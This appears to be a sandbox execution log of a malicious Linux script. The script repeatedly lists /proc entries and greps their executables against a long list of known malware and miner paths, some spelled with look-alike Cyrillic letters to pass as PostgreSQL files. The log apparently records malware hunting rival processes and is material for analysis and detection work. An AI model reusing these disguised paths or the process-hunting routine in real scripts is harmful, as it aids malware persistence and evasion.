/bin/grepgrep exe2⤵PID:837
-
-
/bin/lsls -latrh /proc/202⤵PID:836
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:839
-
-
/bin/grepgrep exe2⤵PID:842
-
-
/bin/lsls -latrh /proc/212⤵PID:841
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:844
-
-
/bin/grepgrep exe2⤵PID:847
-
-
/bin/lsls -latrh /proc/222⤵PID:846
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:849
-
-
/bin/grepgrep exe2⤵PID:852
-
-
/bin/lsls -latrh /proc/232⤵PID:851
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:854
-
-
/bin/grepgrep exe2⤵PID:857
-
-
/bin/lsls -latrh /proc/242⤵PID:856
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:859
-
-
/bin/grepgrep exe2⤵PID:862
-
-
/bin/lsls -latrh /proc/2432⤵PID:861
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:864
-
-
/bin/grepgrep exe2⤵PID:867
-
-
/bin/lsls -latrh /proc/32⤵PID:866
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:869
-
-
/bin/grepgrep exe2⤵PID:872
-
-
/bin/lsls -latrh /proc/3262⤵PID:871
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:874
-
-
/bin/lsls -latrh /proc/3282⤵PID:876
-
-
/bin/grepgrep exe2⤵PID:877
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:879
-
-
/bin/grepgrep exe2⤵PID:882
-
-
/bin/lsls -latrh /proc/3302⤵PID:881
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:884
-
-
/bin/grepgrep exe2⤵PID:887
-
-
/bin/lsls -latrh /proc/3582⤵PID:886
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:889
-
-
/bin/grepgrep exe2⤵PID:892
-
-
/bin/lsls -latrh /proc/3592⤵PID:891
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:894
-
-
/bin/grepgrep exe2⤵PID:897
-
-
/bin/lsls -latrh /proc/362⤵PID:896
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:899
-
-
/bin/grepgrep exe2⤵PID:902
-
-
/bin/lsls -latrh /proc/372⤵PID:901
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:904
-
-
/bin/grepgrep exe2⤵PID:907
-
-
/bin/lsls -latrh /proc/3772⤵PID:906
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:909
-
-
/bin/grepgrep exe2⤵PID:912
-
-
/bin/lsls -latrh /proc/3782⤵PID:911
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:914
-
-
/bin/grepgrep exe2⤵PID:917
-
-
/bin/lsls -latrh /proc/3872⤵PID:916
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:919
-
-
/bin/lsls -latrh /proc/42⤵PID:921
-
-
/bin/grepgrep exe2⤵PID:922
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:924
-
-
/bin/grepgrep exe2⤵PID:927
-
-
/bin/lsls -latrh /proc/4192⤵PID:926
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:929
-
-
/bin/grepgrep exe2⤵PID:932
-
-
/bin/lsls -latrh /proc/52⤵PID:931
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:934
-
-
/bin/grepgrep exe2⤵PID:938
-
-
/bin/lsls -latrh /proc/62⤵PID:937
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:941
-
-
/bin/grepgrep exe2⤵PID:945
-
-
/bin/lsls -latrh /proc/6652⤵PID:944
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:948
-
-
/bin/grepgrep exe2⤵PID:951
-
-
/bin/lsls -latrh /proc/6712⤵PID:950
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:954
-
-
/bin/grepgrep exe2⤵PID:958
-
-
/bin/lsls -latrh /proc/6772⤵PID:957
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:960
-
-
/bin/grepgrep exe2⤵PID:964
-
-
/bin/lsls -latrh /proc/6782⤵PID:963
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:967
-
-
/bin/grepgrep exe2⤵PID:971
-
-
/bin/lsls -latrh /proc/6872⤵PID:970
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:974
-
-
/bin/grepgrep exe2⤵PID:978
-
-
/bin/lsls -latrh /proc/72⤵PID:977
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:981
-
-
/bin/grepgrep exe2⤵PID:984
-
-
/bin/lsls -latrh /proc/702⤵PID:983
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:987
-
-
/bin/lsls -latrh /proc/7012⤵PID:990
-
-
/bin/grepgrep exe2⤵PID:991
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:993
-
-
/bin/grepgrep exe2⤵PID:997
-
-
/bin/lsls -latrh /proc/7022⤵PID:996
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1000
-
-
/bin/grepgrep exe2⤵PID:1004
-
-
/bin/lsls -latrh /proc/7062⤵PID:1003
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1007
-
-
/bin/grepgrep exe2⤵PID:1010
-
-
/bin/lsls -latrh /proc/7072⤵PID:1009
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1014
-
-
/bin/lsls -latrh /proc/7082⤵PID:1016
-
-
/bin/grepgrep exe2⤵PID:1017
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1020
-
-
/bin/grepgrep exe2⤵PID:1024
-
-
/bin/lsls -latrh /proc/7092⤵PID:1023
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1027
-
-
/bin/grepgrep exe2⤵PID:1031
-
-
/bin/lsls -latrh /proc/712⤵PID:1030
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1033
-
-
/bin/grepgrep exe2⤵PID:1037
-
-
/bin/lsls -latrh /proc/7132⤵PID:1036
-
-
